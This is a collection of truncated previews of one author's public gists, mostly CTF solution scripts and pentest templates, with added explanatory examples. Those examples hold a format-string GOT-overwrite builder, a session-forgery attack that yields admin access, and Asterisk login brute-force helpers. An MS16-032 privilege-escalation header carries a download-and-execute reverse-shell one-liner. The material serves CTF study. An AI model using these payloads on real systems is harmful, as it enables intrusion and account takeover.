```python
## Solution for TAMUctf 2017 : pwn200-pwn4
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
from pwn import *

r = remote('web.ctf.tamu.edu', 4324)   # the challenge service
elf = ELF('./pwn4')                    # local copy of the binary, used for symbol lookups
payload = "A"*16                       # 16 bytes of filler at the start of the payload
```

```python
## Solution for TAMUctf 2017 : pwn200-pwn3
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# A big thx to liveoverflow 4 this padding tip, https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w
import struct

# 0x80485ab = print_flag   (function in .text that prints the flag)
# 0x804a01c = exit@plt     (note: an address in the 0x804a000 range of a non-PIE i386
#                           binary is the GOT slot of exit, not the PLT stub, which
#                           sits in .plt near 0x8048xxx; this is the slot to overwrite)
```

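Added example, not code from the gist: the two addresses above are the pair a GOT overwrite needs, pointing the GOT slot of `exit` at `print_flag` so that the program's own `exit()` call runs `print_flag`. The preview does not show how pwn3 obtains the write, so the example assumes the common case of a format-string bug and builds the payload as two `%hn` half-word writes. The argument index `offset` (7 here), the optional 4-byte `prefix` that keeps the addresses aligned on a whole stack argument (the kind of padding adjustment the comment credits LiveOverflow for), and the tiny `simulate_printf` model used to check the write offline are all constructed for the demonstration. Python 3.

```python
import re
import struct

PRINT_FLAG = 0x80485ab   # from the gist comments
EXIT_GOT   = 0x804a01c   # from the gist comments (labelled exit@plt there)

def p32(x):
    """Little-endian 32-bit pack, as on i386."""
    return struct.pack('<I', x & 0xffffffff)

def fmt_write32(target, value, offset, prefix=b''):
    """
    Build a format string that writes the 32-bit `value` to `target` with two
    %hn writes (low half at target, high half at target+2).  `offset` is the
    printf argument index at which the first 4 bytes of our own string are
    found on the stack (assumed found beforehand with a '%N$x' probe).
    `prefix` must be a multiple of 4 bytes; it shifts the addresses by whole
    arguments so they stay aligned.  Addresses must not contain '%' (0x25).
    """
    assert len(prefix) % 4 == 0
    lo, hi = value & 0xffff, (value >> 16) & 0xffff
    payload = prefix + p32(target) + p32(target + 2)
    lo_idx = offset + len(prefix) // 4
    hi_idx = lo_idx + 1
    written = len(payload)            # printf has already output the addresses
    # write the smaller half first so the character count only ever grows
    for val, idx in sorted([(lo, lo_idx), (hi, hi_idx)]):
        pad = (val - written) % 0x10000
        if pad:
            payload += b'%' + str(pad).encode() + b'c'
            written += pad
        payload += b'%' + str(idx).encode() + b'$hn'
    return payload

def simulate_printf(fmt, offset, mem=None):
    """
    Minimal model of printf for the directives used above (%Nc and %K$hn),
    with the stack words at argument `offset`.. being the format string's own
    bytes.  Returns {address: half-word written}.  Constructed for checking.
    """
    mem = {} if mem is None else mem
    args = {}
    for i in range(0, len(fmt) - len(fmt) % 4, 4):
        args[offset + i // 4] = struct.unpack('<I', fmt[i:i + 4])[0]
    count = pos = 0
    while pos < len(fmt):
        m = re.match(rb'%(\d+)c|%(\d+)\$hn', fmt[pos:])
        if m is None:                 # ordinary byte: printed, counts one
            count += 1
            pos += 1
        elif m.group(1) is not None:  # %Nc: N characters of padding
            count += int(m.group(1))
            pos += m.end()
        else:                         # %K$hn: store low 16 bits of the count
            mem[args[int(m.group(2))]] = count & 0xffff
            pos += m.end()
    return mem

def read32(mem, addr):
    """Reassemble the two half-words the simulator stored."""
    return mem.get(addr, 0) | (mem.get(addr + 2, 0) << 16)

if __name__ == '__main__':
    fmt = fmt_write32(EXIT_GOT, PRINT_FLAG, 7)
    print(fmt)
    print(hex(read32(simulate_printf(fmt, 7), EXIT_GOT)))
```

The payload is what you would hand to the vulnerable `printf`; on the real target the argument index and whether a prefix is needed come from probing the binary, not from this file.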
```python
# -*- coding: utf-8 -*-
import re, sys, string, math, time, os, random
sys.path.append("../../LIBS")
from int_netcat import Netcat   # intrd's netcat wrapper shared by the solutions

def get_bitn(xx):
    # double y from 8 until it exceeds xx (first value compared is 16)
    y=8
    for x in range(1,50):
        y=2*y
        if y > xx:
```

```sh
#!/bin/sh
# Forward a remote site:port to a localhost:port
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
iptables -F          # flush every rule in the filter table (any existing firewall config is lost)
iptables -t nat -F   # flush the nat table too
iptables -X          # delete user-defined chains
sysctl -w net.ipv4.conf.all.route_localnet=1   # let the kernel route to 127.0.0.0/8, required for a DNAT to localhost
```

```python
## Nozzlr template : HTTP POST bruteforcer (Solution to shx8 : web200-freelyrics (Wordpress custom bruteforce))
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import urllib, shutil, json, requests, pickle, os.path
target="http://lab.shellterlabs.com:32914"

def nozz_module(payload, self=False, founds=False):
    # payload is the dict of values for this attempt; joined with ':' for logging
    payloads=':'.join(str(v) for v in payload.values())
```

```python
## Solution for SHX10 : misc100-thx (script to vertical slice 1px lines, shuffle and rejoin)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
from __future__ import division
import PIL, Image, random, math, os, time   # Python 2 / old-style PIL import
import numpy as np
from shutil import copyfile

def rejoin(slices,outfilename):
```

```python
## Solution for SHX10 : web200-Read_My_eMail (recover the stream cipher key and create a valid session for every username)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import hashlib

def xor_bytearray(d, k):
    # XOR two byte strings, truncated to the shorter of the two
    return bytearray(a^b for a, b in zip(*map(bytearray, [d, k])))

def generate_sessionid(given_username,anyusername):
```

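Added example, not the gist's code: the attack the title describes in full. If a session id is `username XOR keystream` and the same keystream is used for every user, one known (username, session) pair gives you `keystream = session XOR username`, and XORing that into any other username yields a session the server accepts for that user. The server model (`SERVER_KEYSTREAM`, hex-encoded sessions, the exact layout of the plaintext) is constructed for the demonstration and is an assumption about the challenge; `hashlib` is only used to make up the keystream. The attacker-side functions are the part that carries over. The caveat worth noting: you only recover as many keystream bytes as your known username is long, so a longer target name needs a longer registered username. Python 3.

```python
import hashlib

def xor_bytes(d, k):
    """XOR two byte strings, truncated to the shorter one (same rule as the gist's helper)."""
    return bytes(a ^ b for a, b in zip(d, k))

# ---- constructed server model (assumption, not the challenge's real code) ----
SERVER_KEYSTREAM = hashlib.sha256(b'constructed-secret').digest()   # stands in for the unknown keystream

def server_issue_session(username):
    """Server: session id = hex(username XOR keystream), same keystream for everyone."""
    return xor_bytes(username.encode(), SERVER_KEYSTREAM).hex()

def server_session_user(session_hex):
    """Server: which user a session id belongs to (the check we want to fool)."""
    return xor_bytes(bytes.fromhex(session_hex), SERVER_KEYSTREAM).decode()

# ---- attacker side: the part that carries over to the real target ----
def recover_keystream(known_username, known_session_hex):
    """Known plaintext: keystream = ciphertext XOR plaintext, for len(known_username) bytes."""
    return xor_bytes(bytes.fromhex(known_session_hex), known_username.encode())

def forge_session(known_username, known_session_hex, anyusername):
    """Create a valid session id for anyusername from one (username, session) pair."""
    ks = recover_keystream(known_username, known_session_hex)
    target = anyusername.encode()
    if len(target) > len(ks):
        raise ValueError('only %d keystream bytes known; register a username at least %d long'
                         % (len(ks), len(target)))
    return xor_bytes(target, ks).hex()

if __name__ == '__main__':
    mine = server_issue_session('alice')          # the session the site gave our own account
    forged = forge_session('alice', mine, 'admin')
    print(forged, server_session_user(forged))    # the server now sees us as admin
```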
```python
## Nozzlr template : RAW Asterisk Call Management 1.1 (port 5038) - PoC tested on Asterisk Call Manager 1.1 / FPBX-2.8.1(1.8.7.0), maybe still working on future versions.
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# Make a copy of this template and adapt to your task!
import sys, time
sys.path.append("libs/")
from int_netcat import Netcat
```

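Added example, not the gist's code: the raw AMI framing a template like this has to speak on port 5038. Asterisk greets with a banner line (`Asterisk Call Manager/1.1`), then every packet in both directions is a set of `Key: Value` lines separated by CRLF and terminated by an empty line; a login is `Action: Login` with `Username` and `Secret`, and the reply carries `Response: Success` or `Response: Error`. The sample buffers are constructed, not captured from a real box, and the parser keeps any incomplete trailing packet as leftover because a `recv()` can split a packet. The socket loop itself (the gist's `Netcat` wrapper) is left out. Python 3.

```python
import re

# Constructed sample traffic: banner plus a rejected login, and an accepted login.
SAMPLE_REJECT = (b'Asterisk Call Manager/1.1\r\n'
                 b'Response: Error\r\nMessage: Authentication failed\r\n\r\n')
SAMPLE_ACCEPT = b'Response: Success\r\nMessage: Authentication accepted\r\n\r\n'

def ami_action(action, **fields):
    """Serialise one AMI action: 'Key: Value' lines, CRLF-separated, blank line ends the packet."""
    lines = ['Action: %s' % action] + ['%s: %s' % (k, v) for k, v in fields.items()]
    return ('\r\n'.join(lines) + '\r\n\r\n').encode()

def ami_login(username, secret):
    """The Login action a brute-force loop sends for each candidate pair (events switched off)."""
    return ami_action('Login', Username=username, Secret=secret, Events='off')

def ami_parse(buf):
    """
    Split a receive buffer into complete packets.  Returns (packets, leftover):
    each packet is a dict of its headers, the banner line is dropped because it
    is not a packet, and an incomplete trailing packet is handed back so the
    caller can prepend it to the next recv() chunk.
    """
    packets = []
    m = re.match(rb'Asterisk Call Manager/[\d.]+\r\n', buf)
    if m:
        buf = buf[m.end():]
    while True:
        end = buf.find(b'\r\n\r\n')
        if end < 0:
            return packets, buf
        pkt = {}
        for line in buf[:end].split(b'\r\n'):
            key, _, value = line.partition(b': ')
            pkt[key.decode('utf-8', 'replace')] = value.decode('utf-8', 'replace')
        packets.append(pkt)
        buf = buf[end + 4:]

def login_accepted(packets):
    """True once a Response: Success packet has been seen for the login."""
    return any(p.get('Response') == 'Success' for p in packets)

if __name__ == '__main__':
    print(ami_login('admin', 'secret'))
    pk, rest = ami_parse(SAMPLE_REJECT)
    print(pk, rest, login_accepted(pk))
```

In a real loop you send `ami_login(user, candidate)`, append each `recv()` to a buffer, call `ami_parse` on it, keep the leftover, and stop on `login_accepted`; without the leftover handling a reply split across two reads is silently lost.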
```powershell
## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv
# Follow this cmd to exploit MS16-032 to get admin and run shell.ps1(ATTACHMNT): Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command YOURCOMANDHERE"
# To get a reverse powershell, serve this ms16_032_intrd_mod.ps1 and Invoke-PowerShellTcp.ps1, and use this download & exec oneliner: IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3003"
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
```

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
## Encoding solution - prog300 @ hackaflag 2017 - joao pessoa
# @author intrd - http://dann.com.br/ + pwn4food team
# int_netcat.py: https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
import re, sys, string, math, time, os, random
sys.path.append("../../LIBS")
from int_netcat import Netcat   # intrd's netcat wrapper, see the gist linked above
```